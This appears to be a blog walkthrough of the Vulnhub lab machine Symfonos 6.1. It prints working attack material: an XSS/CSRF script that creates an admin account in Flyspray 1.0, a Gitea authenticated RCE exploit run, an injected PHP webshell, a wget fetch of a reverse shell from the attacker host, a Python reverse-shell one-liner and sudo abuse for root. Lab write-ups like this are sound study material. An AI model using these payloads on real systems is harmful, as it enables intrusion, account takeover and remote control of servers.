Home Vulnhub - Symfonos 6.1
Post
Cancel
Preview Image

Vulnhub - Symfonos 6.1

Overview

This machine begins w/ a web application (flyspray 1.0) that is susceptible to XSS + CSRF on its post comments which will create an admin account for the attacker when admin visits the post causing the malicious script to reflect onto the admin’s browser.

The admin account that is created reveals credentials for the gitea web applicatio hosted on TCP/3000. Also, gitea (1.1.0 to 1.12.5) is susceptible to authenticated remote code execution, allowing us to obtain a shell

For the privilege escalation part, we have to escalate our privileges twice, to achilles and to root. Achilles user is obtain via reused credentials and root is obtained via sudo misconfiguration whereby achilles is allowed to run GO as a superuser, allowing us to run a go reverse shell to obtain root.


Walkthrough

Recon

NMAP Complete Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
# Nmap 7.92 scan initiated Thu Feb 10 21:59:50 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-6.1/192.168.110.24/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-6.1/192.168.110.24/scans/xml/_full_tcp_nmap.xml 192.168.110.24
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #333333; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p \{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #000000; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
adjust_timeouts2: packet supposedly had rtt of -459256 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -459256 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -460360 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -460360 microseconds.  Ignoring time.
Nmap scan report for 192.168.110.24
Host is up, received arp-response (0.00071s latency).
Scanned at 2022-02-10 21:59:51 +08 for 267s
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 0e:ad:33:fc:1a:1e:85:54:64:13:39:14:68:09:c1:70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDf/gc994jzNxH6zt01DmK3gjycek/l6sVS6dfftHPUGVQt/lyQ4WxKgw77iwAHLBHkcXnd3+F3Z0vt9bAxWosreMK9dh9JMCqNitKGbs3v+GbsBUuJClmERzTqbaL/9PqGOGfbbg3JPgVBAhJpF9SUs2pV2mSrxTgNM5faDf7S5qGzdIn6m8ivP70MtGKdF3ogns26ZIU5kvkqUdqUJb/V7HaJjnpDkgQC56Fcy9+FkLHDqsFuBOg4WLuQI+1N7jWHzFedWQ5knzVs78dtlPPGdnrqERThIov8Ki3Fz10X4KOsRccAqbosMWAmhJqTbQPle9qag222SqC9EXCikU6d
|   256 54:03:9b:48:55:de:b3:2b:0a:78:90:4a:b3:1f:fa:cd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFGrBeScWRqBYfW+MJFyVReI/bSSuEsJBllEMyV1lCt9FWPMMFl8konSIH5WWc0r/9LolA9yFDFLDs2xpF9+hhA=
|   256 4e:0c:e6:3d:5c:08:09:f4:11:48:85:a2:e7:fb:8f:b7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO14/cung3UzL0a3rbctlN+MUZnXon2oaNflvb7ISJQW
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3000/tcp open  ppp?    syn-ack ttl 64
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=1a02f70307a7eadb; Path=/; HttpOnly
|     Set-Cookie: _csrf=R9-J7iqrqkstRS8rupP2JoxIsso6MTY0NDUzMDQwMjg3OTgyNDg2MA; Path=/; Expires=Fri, 11 Feb 2022 22:00:02 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Thu, 10 Feb 2022 22:00:02 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|     console.info('ServiceWorker registration successful with scope: ', registrat
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=65f01c822d2e3550; Path=/; HttpOnly
|     Set-Cookie: _csrf=73HOm-6Ii9FgFA2-DHDNERrTlVo6MTY0NDUzMDQwNzkwODUyNjA3OA; Path=/; Expires=Fri, 11 Feb 2022 22:00:07 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Thu, 10 Feb 2022 22:00:07 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|_    console.info('ServiceWorker registration successful
3306/tcp open  mysql   syn-ack ttl 64 MariaDB (unauthorized)
5000/tcp open  upnp?   syn-ack ttl 64
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Thu, 10 Feb 2022 22:00:32 GMT
|     Content-Length: 18
|     page not found
|   GenericLines, Hello, Help, Kerberos, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Thu, 10 Feb 2022 22:00:02 GMT
|     Content-Length: 18
|     page not found
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Thu, 10 Feb 2022 22:00:17 GMT
|     Content-Length: 18
|_    page not found
2 services unrecognized despite returning data. If you know the service/version, please submit the 
TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.110.24

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 10 22:04:18 2022 -- 1 IP address (1 host up) scanned in 268.53 seconds

TCP/80 (HTTP)

FFUF - common.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.24/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.html                   [Status: 403, Size: 207, Words: 15, Lines: 9]
.hta.php                [Status: 403, Size: 210, Words: 15, Lines: 9]
.htaccess.html          [Status: 403, Size: 216, Words: 15, Lines: 9]
                        [Status: 200, Size: 251, Words: 26, Lines: 22]
.htaccess.txt           [Status: 403, Size: 215, Words: 15, Lines: 9]
.htpasswd               [Status: 403, Size: 211, Words: 15, Lines: 9]
.htpasswd.html          [Status: 403, Size: 216, Words: 15, Lines: 9]
.htaccess               [Status: 403, Size: 211, Words: 15, Lines: 9]
.htpasswd.txt           [Status: 403, Size: 215, Words: 15, Lines: 9]
.htaccess.php           [Status: 403, Size: 215, Words: 15, Lines: 9]
.hta.html               [Status: 403, Size: 211, Words: 15, Lines: 9]
.hta                    [Status: 403, Size: 206, Words: 15, Lines: 9]
.hta.txt                [Status: 403, Size: 210, Words: 15, Lines: 9]
cgi-bin/                [Status: 403, Size: 210, Words: 15, Lines: 9]
cgi-bin/.html           [Status: 403, Size: 215, Words: 15, Lines: 9]
.htpasswd.php           [Status: 403, Size: 215, Words: 15, Lines: 9]
flyspray                [Status: 301, Size: 239, Words: 14, Lines: 8]
index.html              [Status: 200, Size: 251, Words: 26, Lines: 22]
index.html              [Status: 200, Size: 251, Words: 26, Lines: 22]
posts                   [Status: 301, Size: 236, Words: 14, Lines: 8]
:: Progress: [18460/18460] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:12] :: Errors: 0 ::
  • cgi-bin/
  • flyspray
  • posts

TCP/3000

FFUF - common.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
└─# ffuf -u http://192.168.110.24:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt  -e '.php,.html,.txt'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.24:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .php .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 10163, Words: 717, Lines: 307]
admin                   [Status: 302, Size: 34, Words: 2, Lines: 3]
avatars                 [Status: 302, Size: 31, Words: 2, Lines: 3]
css                     [Status: 302, Size: 27, Words: 2, Lines: 3]
debug                   [Status: 200, Size: 160, Words: 18, Lines: 5]
explore                 [Status: 302, Size: 37, Words: 2, Lines: 3]
img                     [Status: 302, Size: 27, Words: 2, Lines: 3]
issues                  [Status: 302, Size: 34, Words: 2, Lines: 3]
js                      [Status: 302, Size: 26, Words: 2, Lines: 3]
notifications           [Status: 302, Size: 34, Words: 2, Lines: 3]
vendor                  [Status: 302, Size: 30, Words: 2, Lines: 3]
:: Progress: [18460/18460] :: Job [1/1] :: 366 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
  • admin

TCP/5000

FFUF

  • No directories enumerated

Initial Foothold

TCP/5000 - 404 page

  1. Proceed to http://192.168.110:5000

TCP/3000 (HTTP) - Gitea

  1. View enumerated directories
    • admin
      • Gitea Version 1.11.4
    • Others
      • Redirected to login panel
      • Error page
  2. Proceed to Explore -> Users, found some usernames
    • Usernames:
      • achilles
      • zayotic
  3. Search exploits for Gitea Version 1.11.4

    Exploit TitlePath
    Gitea 1.12.5 - Remote Code Execution (Authenticated)multiple/webapps/49571.py
  4. We have to obtain some credentials before we can use this exploit

TCP/80 (HTTP) - Flyspray 1.0 XSS/CSRF

  1. View enumerated directories
    • cgi-bin/
      • Could not enumerate any .cgi files
    • flyspray
      • flyspray
    • posts
  2. Create a wordlist from /posts
    1
    2
    3
    
     ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
     └─# cewl $ip/posts -w cewl_post.txt
     CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
    
  3. Register user testing & login
  4. After browsing browsing through /flyspray, found its version
    • flyspray 1.0
  5. Search exploits for flyspray 1.0

    Exploit TitlePath
    FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgeryphp/webapps/41918.txt
  6. Try php/webapps/41918.txt
    1. Register an account
    2. Add a comment under symfonos bug
    3. Login & edit
      • Real Name: "><script src="http://192.168.110.4/script.js"></script>
    4. Create script.js that will create an admin account, hacker:12345678
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      
       var tok = document.getElementsByName('csrftoken')[0].value;
      
       var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">'
       txt += '<input type="hidden" name="action" value="admin.newuser"/>'
       txt += '<input type="hidden" name="do" value="admin"/>'
       txt += '<input type="hidden" name="area" value="newuser"/>'
       txt += '<input type="hidden" name="user_name" value="hacker"/>'
       txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
       txt += '<input type="hidden" name="user_pass" value="12345678"/>'
       txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
       txt += '<input type="hidden" name="real_name" value="root"/>'
       txt += '<input type="hidden" name="email_address" value="root@root.com"/>'
       txt += '<input type="hidden" name="verify_email_address" value="root@root.com"/>'
       txt += '<input type="hidden" name="jabber_id" value=""/>'
       txt += '<input type="hidden" name="notify_type" value="0"/>'
       txt += '<input type="hidden" name="time_zone" value="0"/>'
       txt += '<input type="hidden" name="group_in" value="1"/>'
       txt += '</form>'
      
       var d1 = document.getElementById('menu');
       d1.insertAdjacentHTML('afterend', txt);
       document.getElementById("hacked_form").submit();
      
    5. Start a python HTTP server hosting script.js
      1
      2
      3
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
       └─# python3 -m http.server 80
       Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
      
    6. Wait for administrator to visit the post, script.js is queried
      1
      2
      3
      4
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
       └─# python3 -m http.server 80
       Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
       192.168.110.24 - - [11/Feb/2022 01:10:00] "GET /script.js HTTP/1.1" 304 -
      
  7. Login w/ hacker:12345678
    • achilles:h2sBr9gryBunKdF9

TCP/3000 (HTTP) - Gitea RCE (Authenticated)

  1. Start a listener
  2. Use the exploit we found earlier multiple/webapps/49571.py
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    
    ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
    └─# python3 49571.py -t http://$ip:3000 -u achilles -p h2sBr9gryBunKdF9 -I 192.168.110.4 -P 1337
        _____ _ _______
       / ____(_)__   __|             CVE-2020-14144
      | |  __ _   | | ___  __ _
      | | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution
      | |__| | |  | |  __/ (_| |
       \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
    
    [+] Starting exploit ...
    hint: Using 'master' as the name for the initial branch. This default branch name
    hint: is subject to change. To configure the initial branch name to use in all
    hint: of your new repositories, which will suppress this warning, call:
    hint: 
    hint: 	git config --global init.defaultBranch <name>
    hint: 
    hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
    hint: 'development'. The just-created branch can be renamed via this command:
    hint: 
    hint: 	git branch -m <name>
    Initialized empty Git repository in /tmp/tmp.hAJ2fkCy4d/.git/
    [master (root-commit) cae0214] Initial commit
     1 file changed, 1 insertion(+)
     create mode 100644 README.md
    Enumerating objects: 3, done.
    Counting objects: 100% (3/3), done.
    Writing objects: 100% (3/3), 241 bytes | 241.00 KiB/s, done.
    [+] Exploit completed !
    

  3. Manual exploit

TCP/22 (SSH)

  1. Obtain a more stable shell by copying your private key into git’s .ssh/authorized_keys
    1
    2
    
     [git@symfonos6 tmp]$ cd /home/achilles
     [git@symfonos6 ~]$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeiQIVUawX98au7XzxT8GIdr2FNcZxtxpyDU/+TuwyCyoyWeM6iRyy2f+1xRqeca7dsaPIsPtp7nKwcpDzMCH9uXMKZFXBU4GedcDgL5rFMWONq6GdivuY+oflxlukJrnFn8Y/roNqjtwntXKnV+1dkCXjI8zLly7V1nt7W3U+kLzUgem3uso18RCoCTJLf+XlrF0PGuiuIGP3zZVuadrYm5VdDwbgOSUcUL3Zu+FU1W1wC2QE0EhhgBWXrwBQuIZiq4rFRo9RuxoFl42YyFgGugmV405/ROAXypR+M7vT5JnUt/7Zs4Y2lmapKY8rS93EPZIfurBCzB2YUNyNBbrZHyxAj/5I9iLqdRPvyI22NoRTz7U9s= root@kali" > .ssh/authorized_keys
    
  2. SSH w/ your id_rsa
    1
    2
    3
    4
    
     ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
     └─# ssh git@$ip -i /root/.ssh/id_rsa 
     Last login: Thu Feb 10 20:39:02 2022 from 192.168.110.4
     [git@symfonos6 ~]$ 
    
  3. Head to Privilege Escalation

Initial Foothold (2) - Exploit API

  1. Instead of exploiting Gitea itself w/ 49571.py, exploit the api at TCP/5000
  2. Login Gitea w/ achilles:h2sBr9gryBunKdF9
  3. Proceed to Repositories -> symfonos-api, it contains the source code for the API running at TCP/5000
  4. I am not familiar with golang, so I am not 100% sure what the code is doing.
  5. After viewing the code, we are able to insert do RCE
    1. api.go
      • access the api at http://$ip:5000/ls2o4g
    2. posts.go
      • Before we can POST a webshell, we must be authenticated first
      • We can POST a webshell at /ls2o4g/api/v1.0/posts
    3. auth.go
      • We are able to authenticate at /ls2o4g/api/v1.0/auth/login
    4. index.php
      • htmlspecialchars, characters are escaped
  6. Obtain a shell by bypassing htmlspecialchars & inserting a web shell, refered to a writeup to create the json request.
    1. Authenticate
      1
      2
      3
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1]
       └─# curl -H "Content-Type: application/json" "http://$ip:5000/ls2o4g/v1.0/auth/login" -d '{"username":"achilles","password":"h2sBr9gryBunKdF9"}'
       {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTQwOTUsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.Jd-JaDANHB02bKU80EaSvdlXG-ggfDRxR4ly36IG8FM","user":{"display_name":"achilles","id":1,"username":"achilles"}}
      
    2. Base64 encode webshell to bypass htmlspecialchars
      1
      2
      
       echo '<?php system($_GET["cmd"]); ?>' | base64
       PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
      
    3. Insert a webshell to post
      1
      2
      3
      
       curl -H "Content-Type: application/json" -X PATCH "http://$ip:5000/ls2o4g/v1.0/posts/1" -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTYwOTIsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.K2htM7cr61qekEVl4ueWKvblmQAmTbMMg7LaQgPvIb4" -d $'{"text":"file_put_contents(\'shell.php\', base64_decode(\'PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==\'));"}'
      
       {"created_at":"2020-04-02T04:41:22-04:00","id":1,"text":"file_put_contents('shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg=='));","user":{"display_name":"achilles","id":1,"username":"achilles"}}
      
      • Webshell is inserted to the body of /post, however, the code is not executed yet.
    4. Execute our payload by visting /post
      1
      2
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1]
       └─# curl http://192.168.110.25/posts/
      
    5. Obtain a shell
      1
      2
      
       # Enter this in your browser
       http://192.168.110.31/posts/shell.php?cmd=python%20-c%20%27socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.4",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")%27
      

  7. Alternative, bypassing htmlspecialchars by downloading a webshell directly onto the webserver
    1. Insert php code to download php-reverse-shell.php into the body of /post
      1
      2
      3
      4
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api]
       └─# curl -H "Content-Type: application/json" -X PATCH "http://$ip:5000/ls2o4g/v1.0/posts/1" -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTYwOTIsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.K2htM7cr61qekEVl4ueWKvblmQAmTbMMg7LaQgPvIb4" -d $'{"text":"system(\'wget 192.168.110.4/php-reverse-shell.php\')"}' --header "Content-Type: application/json" 
      		
       {"created_at":"2022-02-10T23:15:45.778410883-05:00","id":6,"text":"system('wget 192.168.110.4/php-reverse-shell.php')","user":{"display_name":"achilles","id":1,"username":"achilles"}}
      
    2. Start a python http server hosting php-reverse-shell.php
      1
      2
      3
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api]
       └─# python3 -m http.server 80
       Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
      
    3. Execute the php code to download php-reverse-shell.php
      1
      2
      3
      4
      5
      6
      7
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1]
       └─# curl http://192.168.110.25/posts/
      			
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api]
       └─# python3 -m http.server 80
       Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
       192.168.110.25 - - [11/Feb/2022 04:17:21] "GET /php-reverse-shell.php HTTP/1.1" 200 -
      
    4. Execute php-reverse-shell.php
      1
      2
      
       ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api]
       └─# curl http://$ip/posts/php-reverse-shell.php
      

Privilege Escalation

Achilles - Via Creds Found

  1. Switch to Achilles w/ achilles:h2sBr9gryBunKdF9

Root - Via Sudo

  1. Check for sudo access
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    
     [achilles@symfonos6 git]$ sudo -l
     Matching Defaults entries for achilles on symfonos6:
         !visiblepw, always_set_home, match_group_by_gid, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
         LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
         LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
         env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
    
     User achilles may run the following commands on symfonos6:
         (ALL) NOPASSWD: /usr/local/go/bin/go
     [achilles@symfonos6 git]$ 
    
  2. Create go reverse shell
  3. Transfer to target
  4. Execute reverse shell
    1
    
     [achilles@symfonos6 tmp]$ sudo /usr/local/go/bin/go run /tmp/rev.go
    
  5. Root shell obtained
  6. Root Flag
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    
     cat proof.txt
    
                Congrats on rooting symfonos:6!
                       ,_---~~~~~----._         
                _,,_,*^____      _____``*g*\"*, 
               / __/ /'     ^.  /      \ ^@q   f 
              [  @f | @))    |  | @))   l  0 _/  
               \`/   \~____ / __ \_____/    \   
                |           _l__l_           I   
                }          [______]           I  
                ]            | | |            |  
                ]             ~ ~             |  
                |                            |   
                 |                           |   
          Contact me via Twitter @zayotic to give feedback!
    
This post is licensed under CC BY 4.0 by the author.

Vulnhub - Digitalworld.local (FALL)

Vulnhub - Digitalworld.local (JOY)

Comments powered by Disqus.